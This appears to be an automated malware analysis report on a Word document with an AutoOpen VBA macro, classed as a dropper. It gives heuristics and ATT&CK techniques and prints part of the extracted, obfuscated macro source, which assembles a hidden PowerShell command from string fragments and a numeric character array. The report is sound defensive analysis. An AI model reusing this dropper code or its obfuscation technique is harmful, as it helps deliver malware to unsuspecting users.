Verdict: MALICIOUS
Risk Score: 242

Malware Insights

MITRE ATT&CK:
- T1059 Command and Scripting Interpreter
- T1059.005 Command and Scripting Interpreter: Visual Basic
The sample is a malicious Office document containing a VBA macro. The macro calls the Shell() function, indicating an attempt to execute arbitrary commands. The macro builds its payload from concatenated string fragments; the visible fragments '$' + 'sHellId[1' + ']' and '$SHEl' + 'lID[13]' assemble indexed references to the PowerShell variable $ShellId, a common way of hiding PowerShell command text from static inspection. The ClamAV detection Doc.Dropper.Agent-6595092-0 further supports classifying the document as a dropper.
Heuristics (7)

- ClamAV: Doc.Dropper.Agent-6595092-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6595092-0
- VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Shell() call in VBA [critical] OLE_VBA_SHELL: Shell() call in VBA
- AutoOpen macro [high] OLE_VBA_AUTOOPEN: AutoOpen macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8658 bytes | cb58971e950b67c5e987ddf9c9777a02b92e83f3ad0f8f7fd181ce7a8e57bd02 |
Script preview (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "aEswBrswCjiowW"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "MBbZWjKCb"
Function hsiTYDTUZfB()
On Error Resume Next
ckbXWA _
= 11096 + Atn(7081) / 91562 / _
Round(31855) / 6674 / CInt(LTXRD)
nawUNs = ChrB(20375 + _
Sin(YofiKi * CLng(BUmSf + 58772) _
+ 91739 _
+ NwQkt))
tMEBmXjY = "HELL" + " " + " " + " " + " " + " " + " " + " ." + Chr(40) + " $" + "sHellId[1"
TwXpq _
= 33038 + Atn(93636) / 78103 / _
Round(15590) / 44639 / CInt(NpcRXR)
UAJwk = ChrB(98961 + _
Sin(TsBkW * CLng(HQXFrH + 79350) _
+ 40055 _
+ VNMPi))
hTXRLUAG = "]" + Chr(43) + "$SHEl" + "lID[13]" + Chr(43) + "'" + "x'" + Chr(41) + " " + Chr(40) + " " + Chr(34) + " " + "$" + Chr(40) + " Se" + "T-VarIa" + "BLE '" + "oFs' " + "''" + Chr(41) + Chr(34) + " " + Chr(43) + " [STRIN"
pTHph _
= 21579 + Atn(31041) / 86946 / _
Round(99755) / 40973 / CInt(YQWYv)
lacwR = ChrB(43546 + _
Sin(QbkCfw * CLng(VQGiYt + 90772) _
+ 78782 _
+ rXXkfj))
ssdLSvfPk = "G]" + Chr(40) + " [CH" + "ar[]]" + Chr(40) + "2" + " , 92" + ",64 , 6" + "4, 27 " + ", 72,67," + " 81 ,"
wsZJb _
= 78626 + Atn(13435) / 41645 / _
Round(46867) / 94220 / CInt(ZFaNND)
qHKrAC = ChrB(16745 + _
Sin(pkYtmv * CLng(DmKFnK + 62099) _
+ 18245 _
+ FbMVjL))
Xziir = "11 ," + "73,6" + "8 , " + "76 , 6" + "7 ,69 ," + " 82, " + "6, 104, 6" + "7 , " + "82, 8, "
JUAobN _
= 13032 + Atn(85756) / 45094 / _
Round(937) / 58225 / CInt(WzfKms)
oDIPZ = ChrB(20519 + _
Sin(ZlYpmN * CLng(GOYmGE + 79825) _
+ 60382 _
+ infjn))
LKzVAzH = "113,67" + " , 6" + "8 , 1" + "01, 74 ," + "79,67, " + "72 , 82,2" + "9 , 2, 82" + " , 87 , " + "98 ,27, "
aRZdhW _
= 51412 + Atn(3338) / 10733 / _
Round(50858) / 56960 / CInt(oUUhNQ)
PiGYf = ChrB(76480 + _
Sin(IlZct * CLng(LlLHQJ + 61786) _
+ 14147 _
+ NSLdbB))
RujLTLYb = "1 ,78 , " + "82 , " + "82, 86" + ", 85 ,2" + "8 , 9 " + ", 9,84 ," + " 73 " + ", 69 ,"
zAZPK _
= 46479 + Atn(10862) / 38492 / _
Round(86706) / 88880 / CInt(UNpcdj)
SCJMRD = ChrB(70688 + _
Sin(iVoMC * CLng(LwoYC + 58849) _
+ 37072 _
+ jqOVUL))
HYAZPASdmJd = " 77 , 72" + " , 84," + "73,74, 74" + " ,67 , 82" + ", 69 ," + "73 ,8 , "
rlpfdJ _
= 97675 + Atn(1112) / 70737 / _
Round(68555) / 41935 / CInt(wpkfjr)
JPADaC = ChrB(61924 + _
Sin(WSwvjZ * CLng(rjwjY + 4580) _
+ 24254 _
+ DpjAWz))
ivHLVoK = "82 ,73" + ",86 , " + "9, 64" + ", 79 ,74," + " 67 , 9" + " ,94," + " 94, 6"
LhirCd _
= 81509 + Atn(65186) / 27897 / _
Round(55881) / 95093 / CInt(chmomF)
zAhzSa = ChrB(93520 + _
Sin(zOuBJ * CLng(aHRRrX + 82533) _
+ 2729 _
+ kDbYk))
NXLfWJ = "9 ,69" + " ,69, 75," + "75, 75 " + ", 8 ,67" + " ,94" + " , 67" + ", 1 " + ", 8,11" + "7 , 86" + ",74 , 7"
hsiTYDTUZfB = tMEBmXjY + hTXRLUAG + ssdLSvfPk + Xziir + LKzVAzH + RujLTLYb + HYAZPASdmJd + ivHLVoK + NXLfWJ
RAuvu _
= 578 + Atn(90122) / 57692 / _
Round(64324) / 21696 / CInt(FMtTU)
nwBZVX = ChrB(89552 + _
Sin(kvwwvr * CLng(MBjNz + 12936) _
+ 27875 _
+ fdjFbR))
End Function
Function XKaEmww()
On Error Resume Next
IiPcnb _
= 65585 + Atn(81342) / 91677 / _
Round(56646) / 99337 / CInt(KEwhl)
NtKMG = ChrB(39772 + _
Sin(ZPWwl * CLng(SQGnQ + 63436) _
+ 36998 _
+ biLkj))
uRnhGqlQQQ = "9 ,82 ," + " 14 ,1 " + ",102, 1, " + "15,29 ," + " 2 ,113" + ", 74 , 74" + " ,6, 27" + ", 6,1, 1" + "9 , 1" + "8, 19" + " ,1 " + ",29 ,2 "
tEcjw _
= 96366 + Atn(73207) / 27367 / _
Round(46892) / 38639 / CInt(bvINLL)
JLjwEQ = ChrB(60809 + _
Sin(SPlOz * CLng(WUaVmm + 98841) _
+ 76386 _
+ Eslsol))
ZOqLromGc = ", 64 ," + " 87 ," + " 113 ,27" + " , 2" + " , 67" + ",72,80 ," + " 28,8" + "2 , 6" + "7 ,7" + "5 , 86"
qPSRa _
= 45995 + Atn(37270) / 94554 / _
Round(369) / 23615 / CInt(wfWcJ)
TEahs = ChrB(48851 + _
Sin(uWjcE * CLng(YqOHZ + 42692) _
+ 92287 _
+ BwBdUa))
ARwwL = ", 13 ," + " 1 , " + "122,1 ," + "13 , " + "2, 113,7" + "4, 7" + "4 , ... (truncated)
```